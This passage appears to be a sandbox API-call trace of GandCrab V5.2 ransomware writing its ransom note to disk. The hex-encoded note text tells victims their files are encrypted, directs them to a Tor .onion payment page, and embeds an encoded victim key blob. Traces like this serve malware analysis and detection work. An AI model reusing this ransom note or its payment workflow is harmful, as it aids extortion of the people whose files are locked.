pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0073.479] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.479] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0073.479] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\\\TITWMVJL-DECRYPT.txt") returned 96 [0073.479] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\systemcertificates\\my\\crls\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0073.480] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0073.480] WriteFile (in: hFile=0x2cc, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259e824, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259e824*=0x2162, lpOverlapped=0x0) returned 1 [0073.481] CloseHandle (hObject=0x2cc) returned 1 [0073.481] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.481] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 